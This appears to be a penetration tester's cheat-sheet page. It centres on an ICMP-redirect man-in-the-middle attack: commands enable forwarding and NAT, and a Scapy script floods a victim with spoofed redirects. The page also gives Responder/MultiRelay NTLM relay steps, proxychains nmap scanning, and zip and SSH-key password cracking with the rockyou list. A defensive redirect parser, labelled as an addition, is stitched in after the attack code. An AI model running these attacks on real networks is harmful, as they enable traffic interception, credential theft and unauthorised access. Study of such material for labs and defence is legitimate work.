Categories: ICMP-Redirect Attack

ICMP-Redirect Attack

Enable IP forwarding and source NAT (masquerading) for the victim subnet:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT   # only needed for forwarded traffic
sudo iptables -t nat -L
  • ip – gateway = 10.100.31.1
  • ip – victim = 10.100.13.126
  • ip – attacker = 10.100.13.20
  • ip – victim website = 10.23.56.100

Scapy: create an ICMP redirect packet (type 5) that announces a "better" gateway for traffic to destination 10.23.56.100

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
<bound method IP.display of <IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
<bound method IP.display of <IP  src=10.100.13.126 dst=10.23.56.100 |>>


# Creating and sending ICMP redirect packets
from scapy.all import IP, ICMP, TCP, send

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP payload should quote the original TCP SYN packet
# sent by the victim IP (the datagram that is being redirected)

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:
    send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>
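A defender-side counterpart, added here and not part of the original post: a small parser that recognises the ICMP redirect layout described above (type 5, code 1, gateway field, quoted original IP header) and flags redirects whose sender or advertised gateway is not a known router. The sample bytes are constructed from the page's addresses; KNOWN_ROUTERS is an assumption.

```python
import ipaddress
import struct

# Assumption: 10.100.13.1 (the page's originalRouterIP) is the only legitimate router.
KNOWN_ROUTERS = {"10.100.13.1"}
ICMP_REDIRECT = 5


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header; checksum left 0 (constructed sample only)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                       proto, 0, ipaddress.IPv4Address(src).packed,
                       ipaddress.IPv4Address(dst).packed)


def build_redirect_sample(router: str, victim: str, gateway: str, server: str) -> bytes:
    """Constructed packet: IP(router->victim) / ICMP type 5 code 1 / IP(victim->server) / TCP SYN."""
    tcp_syn = struct.pack("!HHIIBBHHH", 55555, 80, 444444444, 0, 0x50, 0x02, 8192, 0, 0)
    inner = ipv4_header(victim, server, 6, len(tcp_syn)) + tcp_syn
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, 1, 0,
                       ipaddress.IPv4Address(gateway).packed) + inner
    return ipv4_header(router, victim, 1, len(icmp)) + icmp


def parse_redirect(packet: bytes):
    """Return the fields of an ICMP redirect, or None if the packet is not one."""
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1:                      # protocol field: 1 = ICMP
        return None
    icmp = packet[ihl:]
    if icmp[0] != ICMP_REDIRECT:
        return None
    inner = icmp[8:]                        # quoted header of the original datagram
    return {
        "claimed_router": str(ipaddress.IPv4Address(packet[12:16])),
        "target_host": str(ipaddress.IPv4Address(packet[16:20])),
        "code": icmp[1],                    # 1 = redirect for host
        "new_gateway": str(ipaddress.IPv4Address(icmp[4:8])),
        "flow_src": str(ipaddress.IPv4Address(inner[12:16])),
        "flow_dst": str(ipaddress.IPv4Address(inner[16:20])),
    }


def is_suspicious(info: dict) -> bool:
    """Plausible only when sender and advertised gateway are both known routers."""
    return (info["claimed_router"] not in KNOWN_ROUTERS
            or info["new_gateway"] not in KNOWN_ROUTERS)


# Constructed sample using the page's addresses (spoofed sender, attacker as gateway).
SAMPLE = build_redirect_sample("10.100.13.1", "10.100.13.126", "10.100.13.20", "10.23.56.100")
```

Because the sender address is trivially spoofed, the gateway check is the one that catches this sample; hosts that set net.ipv4.conf.all.accept_redirects=0 ignore such packets regardless.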

Proxychains

proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129

Debian Tips

How to list all services in Debian

If you want to see all services installed on Debian 10, you can run the following command.

ls /etc/init.d

If you want to get a more detailed list of all services and processes running in your Debian operating system, execute the following command.

systemctl list-unit-files

How to check the status of a particular service using init.d

There are several ways to check whether a particular service is running. One such method uses init.d. Execute the command with root privileges, using the following syntax:

/etc/init.d/{servicename} status

Let's check the status of the networking service. The complete command looks like this:

/etc/init.d/networking status

How to stop, start and restart a particular service

There are two methods of stopping and starting a particular service. I will list both methods here.

Start and stop a service using init.d

Let me start by stopping the running networking service to show you how to stop any service with init.d. Execute the following command with root privileges:

/etc/init.d/networking stop

Print route

route -n

Responder

1. Run RunFinger.py -i <target IP> against the target

2. Modify the Responder.conf configuration file and disable the "SMB" server and "HTTP" server options by setting their values to "Off".

3. python Responder.py -I eth0 --lm

4. python MultiRelay.py -t <target IP> -u ALL



ZIP crack

fcrackzip -D -p /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt XXX.zip


Windows Tricks


TIME

net time -S IP -U ""

date -s time

rdate -n ip


TCPDUMP

tcpdump -i tun0 icmp   # protocol filter


Stego

Look inside a picture for embedded content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png

SSH

Use an SSH private key (.priv file)

chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Extract Password from id_rsa key

python /usr/share/john/ssh2john.py id_rsa > test

john --wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test